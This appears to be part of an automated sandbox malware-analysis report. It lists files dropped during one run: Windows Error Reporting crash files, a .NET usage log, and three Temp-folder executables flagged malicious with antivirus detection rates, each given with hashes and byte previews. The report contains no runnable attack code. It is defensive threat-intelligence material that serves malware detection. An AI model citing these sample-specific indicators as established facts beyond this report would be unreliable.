                                                                                                                                                                                                            SHA-256:F2EAB83FE956D6CCAA66597AC764992AFAFDF32BC472C16C17721711685E9E23
                                                                                                                                                                                                            SHA-512:7308CFE4C3AF2F52388AD915E55AFDEC057B4146DF2CC342335821EDEBC20FEFECBBBF5ED636F3B8AFB238A048859A189C3574B03127E23B013CB1330EC23DC2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ........................................3...w..*....z.......w...............w.......w....:O.....w.....................*....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_60C2.exe_b994e4a82aa011c06f96cb901a89f64e833a6a1c_f737e9d6_0beefd4a\Report.wer
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.8141362247109446
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:f8NFFznbXSGLzCHyA+9OQoJ7R3V6tpXIQcQec6tycEfcw3WFz+HbHg/8BRTf3o8e:UnznW4eSo8HQ0l7jIq/u7syS274Itf
                                                                                                                                                                                                            MD5:8E70A2A7A41C0DAA597D4DE569DD1103
                                                                                                                                                                                                            SHA1:1DC0A1EDC935BF48C2ABC3EFB1E9718ADDFEEFE8
                                                                                                                                                                                                            SHA-256:923DFEF1785F738691F6ADB632C2765D66DDD11CEC802678AAD12CD9196B6D7F
                                                                                                                                                                                                            SHA-512:04CB2EE6D8F3461987DCA542929C8E5DFC379DB932E069FB6DEC4750A8BBBD28ADD933DB651CB39E7516F0FC5B48A939E75A02247CE56649152AB3E526B392A3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.1.8.9.6.3.4.5.8.2.3.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.1.8.9.7.9.5.5.1.9.0.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.a.e.7.f.1.f.-.b.0.1.6.-.4.d.e.7.-.9.f.5.8.-.f.3.a.d.b.3.4.3.a.3.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.a.5.1.d.c.e.-.6.8.7.3.-.4.5.c.b.-.8.6.9.9.-.1.3.b.8.8.e.b.4.d.4.a.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.0.C.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.c.-.0.0.0.1.-.0.0.1.7.-.6.8.6.3.-.9.6.6.d.1.8.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.6.1.c.4.3.d.4.6.5.8.4.5.6.a.1.b.f.3.a.c.1.6.0.4.f.5.5.1.8.b.1.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.6.0.C.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER27C7.tmp.csv
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53092
                                                                                                                                                                                                            Entropy (8bit):3.0504300134413387
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:6gHzsgnsrlS1jO9AEojWxfbWIwtt0IbRpvuCPYq:6gHzsgnsrlS1jO9AEojWxfSIwtt0IbR5
                                                                                                                                                                                                            MD5:C011905D2C70667B9C517B4D7E3ACDA2
                                                                                                                                                                                                            SHA1:B70D4DDD72CBCCE688B3B3AD22BCD006D123C096
                                                                                                                                                                                                            SHA-256:93E4F641A0328CD61DDFA891D41D5970476DC6C7B63A47FECF0C11967BDF950B
                                                                                                                                                                                                            SHA-512:2C90438FABB46A25AC6441A602BE70EF872A4951D17F8D0215724158844CDD9E2450644DAD757214167F5AD2BCDA2707BEE7C7B2753F6F6CC5E5A96A10767A0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD2.tmp.txt
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                                            Entropy (8bit):2.6994209673274248
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9GiZYWJ0G7p9WYXY6W18eziHdYEZ7xtYiAkwvjOwdSCaAcEtqhXg7IV713:9jZDJ0vAOXCIXharEqhXpV713
                                                                                                                                                                                                            MD5:4C6B1B2C012A457482F8CBB38B75888D
                                                                                                                                                                                                            SHA1:F7DB80090AEE55660CC28A073F1F4AED0F332D26
                                                                                                                                                                                                            SHA-256:42B29C438F9A38548D3C5BF4C662069D6C2D102DED5E97EB15FA4787DD0B9E2E
                                                                                                                                                                                                            SHA-512:896FAC6BB53B169ECF864947ACD1C5B9CE74C1BE65FCC953C961259473C97A7C5A9FFB7AC63A46B417E50CB46C47BD80D53C53A553B07E6E16C35E2F747E3BC7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C4C.tmp.txt
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                                            Entropy (8bit):2.696610353143529
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9GiZYWGPcKi3YuYkWazH6nYEZgAtPiTFK+6wR56aW0pMBi4yENIv0B3:9jZDbpIeBkaW0iBi4yzsB3
                                                                                                                                                                                                            MD5:FF0B8841B96BCFC15D8534442B4DB606
                                                                                                                                                                                                            SHA1:5210CF5DD5921B479EFFDE18E5AC82F0F852D0AD
                                                                                                                                                                                                            SHA-256:2BA90252B066DDBB6E4C60E984E3B6A20473D208CEDBCC55E6C81811B491074B
                                                                                                                                                                                                            SHA-512:582AC00D42F0D4E0CD6B704707920CA0596211B54BA1E0EF6D4D9C942FF3AD70908B672D0FCBAFB285A80CA7628E184297661CE9B2D7136E31BA36BE9F3DE6C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4237.tmp.dmp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 07:29:24 2022, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36668
                                                                                                                                                                                                            Entropy (8bit):2.1215398826650915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5JS888//qUNJHeuuoi7ehEnus9D5a5aiqQ9E+5RVhTugZM2rgGosz30k2WInWIXH:RXRrNHOeh0k6+nrrfos4k7SkcEIJ
                                                                                                                                                                                                            MD5:AB57E822444B815F1AE1D46462953A26
                                                                                                                                                                                                            SHA1:09B089DC757DE5244BD68A45D68D87805D2B7E17
                                                                                                                                                                                                            SHA-256:FF1E2FCAA91C87802E5154F2C9157BDDCA188F5F954E634237B0BD485EBA13AA
                                                                                                                                                                                                            SHA-512:80348AD1738352FC2C7643AE5557ABA684DB91D71C0CC7880CD5A79AB975160D37342124C70854AE02BCE6A68AD1043FBD08960B0E67CC67096DC3E42D167666
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MDMP....... .......T&.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T.......,...H&.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER44E.tmp.csv
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61464
                                                                                                                                                                                                            Entropy (8bit):3.0333924723012595
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPHmopTW2gAbslRhHVAEFh5e8vATrKVNB/9KJxs/fwe:pPHmopTW2gAbslRhHVpFh5e8vATrKVNF
                                                                                                                                                                                                            MD5:C69B0E4857750FCCC49E90AE82BFDA7B
                                                                                                                                                                                                            SHA1:749AC3C4FA1376349529E79466D165F7C9C9B071
                                                                                                                                                                                                            SHA-256:F8056552462B214AB6E2015013FFAEB9D8EF71B7F19EC19F166418E062799006
                                                                                                                                                                                                            SHA-512:4368B704EE08A61D5D68BA8C798E3AAC30EA05468AE3CE6EA80DD2D45856F298FEFBE70DA2F2D3C33BE125E34C2A468FB4AB77D4431386591E2B07B9B34FD3E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER48A1.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8390
                                                                                                                                                                                                            Entropy (8bit):3.698995042194666
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiJs67sQ6YJtSUggmfcRSgCpD389bfEYsfcj1m:RrlsNiC67sQ6YDSUggmfcRSYfELfcM
                                                                                                                                                                                                            MD5:F8B49D24DAB61629DBB4C193F37A628D
                                                                                                                                                                                                            SHA1:036A1F7B6B1C50D44714BD3D54A89357CD23EBF1
                                                                                                                                                                                                            SHA-256:8E3897A6926F9A21310DB0B023C9BF2CDD9BF393D5E7ED0D968DD9D5652C21C1
                                                                                                                                                                                                            SHA-512:D6434F1E91ACA6EAA4600FBB2BD67EEB6CDB4209795E9576EB54042B1FEDE8BF42C62B6B881F667D5D92F7B96401B35FC7C52BE70622D45A2DD2CC130A8A8754
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.8.<./.P.i.d.>.......
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D84.tmp.xml
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4685
                                                                                                                                                                                                            Entropy (8bit):4.47237264790422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwSD8zsRJgtWI9LDWSC8Br/8fm8M4Jd8qFR+q8v58u1E/EnaMd:uITfjcySNuJzKFRnaMd
                                                                                                                                                                                                            MD5:2B73F70467BA437B411066239627D3AD
                                                                                                                                                                                                            SHA1:9F2057968FC910968C129DA384900FF9B167D6E5
                                                                                                                                                                                                            SHA-256:705A61F9FACB547638362C1C7E8C2F85ABA41AEF45802B1AB66772BABBA3A898
                                                                                                                                                                                                            SHA-512:181E3D7715D468E483C43E84C40A980D78FF7C9408F7463BB3DA051463D3F432CDF1408B1C89265731964259CC955500E1BF8389E132F8B497C9BFAABDF1B1CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341640" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B3BA.exe.log
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):700
                                                                                                                                                                                                            Entropy (8bit):5.346524082657112
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                            MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1BCC.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\382E.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):373760
                                                                                                                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\5126.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):356864
                                                                                                                                                                                                            Entropy (8bit):7.848593493266229
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
                                                                                                                                                                                                            MD5:6E7430832C1C24C2BF8BE746F2FE583C
                                                                                                                                                                                                            SHA1:158936951114B6A76D665935AD34F6581556FCDF
                                                                                                                                                                                                            SHA-256:972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
                                                                                                                                                                                                            SHA-512:79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
